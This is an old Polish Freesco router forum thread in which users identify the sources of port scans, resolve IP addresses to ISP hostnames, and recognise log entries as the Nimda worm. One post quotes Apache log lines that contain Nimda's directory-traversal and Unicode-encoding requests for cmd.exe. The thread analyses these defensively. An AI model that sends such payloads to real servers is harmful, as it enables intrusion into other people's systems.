Freesco, NND, CDN, EOS http://forum.freesco.pl/ |
|
ip ip powiedz czyje ty jestes http://forum.freesco.pl/viewtopic.php?f=35&t=685 |
Strona 1 z 1 |
Autor: | Anonymous [ wtorek, 22 października 2002, 19:03 ] |
Tytuł: | ip ip powiedz czyje ty jestes |
khe khe a wiec tak: ciagle pojawiiaja sie wpisy w logach ip takie to a takie i proba polaczenia np z portem 80 (po jakiego to ni wiem) albo z innymi portami nurtuje mnie sprawa kto to czy jest rozsadny sposob sprawdzenia kto to bez powiadamiania tepsy itp |
Autor: | Anonymous [ wtorek, 22 października 2002, 19:06 ] |
Tytuł: | |
a niech tam niech wszyscy wiedza to o te ip chodzi (potrafia w ciagu 5minut nawiazac 10 prob polazenia): 207.144.202 80.5.55.76 80.49.4.23 213.118.27.96 80.49.181.82 80.14.38.92 moze sie dowqiem wreszcie |
Autor: | Anonymous [ wtorek, 22 października 2002, 19:27 ] |
Tytuł: | |
207.144.202 dodaj 4 liczbe 80.5.55.76 public2-with2-5-cust76.manc.broadband.ntl.com 80.49.4.23 pi23.czestochowa.sdi.tpnet.pl 213.118.27.96 D5761B60.kabel.telenet.be 80.49.181.82 pa82.bychawa.sdi.tpnet.pl 80.14.38.92 APoitiers-106-1-5-92.abo.wanadoo.fr |
Autor: | Bolo_B [ wtorek, 22 października 2002, 19:31 ] |
Tytuł: | |
80.5.55.76 - public2-with2-5-cust76.manc.broadband.ntl.com 80.49.4.23 - pi23.czestochowa.sdi.tpnet.pl 213.118.27.96 - D5761B60.kabel.telenet.be 80.49.181.82 - pa82.bychawa.sdi.tpnet.pl 80.14.38.92 - APoitiers-106-1-5-92.abo.wanadoo.fr No to ktoś co ma sdi włazi Tobie na serwer - szuka: www jak 80 (albo control panel) 23 to telnet 22 to ssh 21 ftp Nikt nie jest anonimowy ![]() ![]() Oby te ip nie pojawiały się teraz u mnie ![]() |
Autor: | Anonymous [ wtorek, 22 października 2002, 19:33 ] |
Tytuł: | |
Masz moze Apacha zainstalowanego ? a w logach: "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3670 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3670 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670 Ponoc to Nimda. |
Autor: | Bolo_B [ wtorek, 22 października 2002, 19:34 ] |
Tytuł: | |
Ach RoBoS mnie ubiegł jak sprawdzałem ![]() ![]() ![]() |
Autor: | Anonymous [ wtorek, 22 października 2002, 19:36 ] |
Tytuł: | |
Ale wynik taki sam, nie jest zle. ![]() |
Autor: | Bolo_B [ wtorek, 22 października 2002, 19:37 ] |
Tytuł: | |
Ten log to ewidentny włam na Win2000/NT jak mi się zdaje. |
Autor: | Anonymous [ wtorek, 22 października 2002, 19:41 ] |
Tytuł: | |
Fajny robaczek NIMDA na rodzinke NT. ![]() To dopiero zasrywa logi. ![]() |
Autor: | Anonymous [ środa, 23 października 2002, 16:41 ] |
Tytuł: | |
dziekuje apacha ni mam a to sdi to chyba nawet wiem kto to musze sie przejsc do kolesia ![]() ![]() ![]() ![]() ![]() |
Autor: | Anonymous [ czwartek, 31 października 2002, 12:16 ] |
Tytuł: | |
Niekoniecznie mogą to być próby włamuff ![]() Jak ktoś ma odpalony DC albo Imesha tudziez Kazee to tego typu kwiatki nie powinny cie martwic jeśli odnoszą się od wysokich portów [passive w DC] albo do jednego [np.411] - te aplikacje mają to do siebie że ipfwadm -M -ln głupieje ;wiem z autopsji ... Gorzej jeśli widzisz w logach np. 1sek połączenia z serwerem FTP ktory masz odpalony na jakims niestandardowym porcie typu 999... automatycznie wtedy trzeba banana postawić na konkretne IPki ![]() |
Autor: | C-O-N [ środa, 6 listopada 2002, 14:26 ] |
Tytuł: | taki wirus |
Taki wirusek jak wy piszecie dopadl tez moj serv ![]() Tylko skad go dorwal to nie wiem... Powiedzcie jak zblokowac jego ip. Czy wystarczy do rc-user na koncu dopisac : Tym blokuje pakiety a freesco ma jakas black list? host.deny nie znalazlem ![]() |
Autor: | Bolo_B [ środa, 6 listopada 2002, 15:14 ] |
Tytuł: | |
Jak chodzi o NIMDE to wystarczy, że ktoś w sieci złpie ją i będzie sie dobijać do serwera. Taki wirus może atakować ze wszystkich stron, szczególnie po LAN'ie. Może ktoś w sieci ma wirusa, albo Ty. Radze sprawdzić kompy w sieci jakimś antywirusem. |
Autor: | Anonymous [ środa, 6 listopada 2002, 15:29 ] |
Tytuł: | Re: taki wirus |
C-O-N pisze: host.deny nie znalazlem
![]() Banlist.cfg to chyba jest odpowiednik ![]() |
Strona 1 z 1 | Strefa czasowa UTC+2godz. |
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/ |